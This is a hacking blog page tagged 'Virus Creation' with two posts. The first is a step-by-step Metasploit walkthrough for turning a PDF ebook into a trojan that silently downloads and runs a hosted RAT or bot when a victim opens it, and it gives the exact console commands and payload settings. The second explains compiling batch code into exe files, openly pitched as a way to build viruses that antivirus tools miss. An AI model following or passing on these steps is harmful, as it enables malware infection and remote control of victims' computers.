d0837296baef4fc14d667832c1a5215944b54a8f46af2d5c5c TipsS And TricksS: Virus Creation
Showing posts with label Virus Creation. Show all posts
Showing posts with label Virus Creation. Show all posts
on Wednesday, 23 January 2013
Hey friends this is D@rk TruTH. As we all use RAT, Botnets but the things went wrong when our rats and bots get detected by antiviruses. But today i am gonna show you how to backdoor a pdf ebook. 
Yes a pdf ebook.

Concept behind this--->

Victim will open our pdf file but in background it will download our rat and bot silently and will infect the victim.  

Things you need----->

1. A pdf book (use any book)
2. Metasploit(use backtrack OS)
3. Your Rat or bot hosted at any file sharing site(Make sure you use direct link like www.filesharing.com/server.exe)

Now Lets start this---->

1. Open up Metasploit console

2. Type this in the console:use exploit/windows/fileformat/adobe_pdf_embedded_exe

3. Type this in the console:
set payload windows/download_exec


4. Type this in console:set INFILENAME <location of your pdf to infect here>
EXAMPLE: set INFILENAME /root/mypdf.pdf

5. Type this in console:
set url <direct download link to your fud server>
EXAMPLE: set url http://download.com/server.exe

6. Type this in console:Exploit

Now you will get infected pdf in root folder just send ur pdf file to victim and when he open the pdf file he/she will able to read pdf but in background pdf file will download our rat and bot in victim computer.

Note:
1. Use direct link for your rat.
2. Use a good pdf file so as victim try to open it.
on Thursday, 29 December 2011

The best way to learn batch is to experiment while referring to the HELP command, it will explain everything. Batch programs are essentially sequences of DOS commands that 'type themselves' when the batch file is run.Batch files consist of control elements, internal DOS commands and external commands or programs. With a little ingenuity one can duplicate most of the functions of a general purpose language, but doing any kind of math is tricky, there are no arithmetic commands at all. But most of us use Batch codes for creating viruses.One of the important feature of batch viruses are it cant be detected easily by Antivirus systems.If you are not familiar in writing Batch codes read this Batch code for beginners .This article is purely about converting batch codes to exe files.For that we are using a batch compiler


DOWNLOAD LINK




HOW TO WRITE AND COMPILE BATCH CODES


1.  After downloading just install batch compiler and open it see a window as shown below.


2. Click on Source tab and this is the window where you write your batch codes






3. After writing your Batch codes, click on Embedded files tab and Select an icon for your exe file






4. After setting the icon file just click on Build button to convert all the batch code to a single exe file.

Thats it ! Now make your own exe files with the batch codes and enjoy !!!!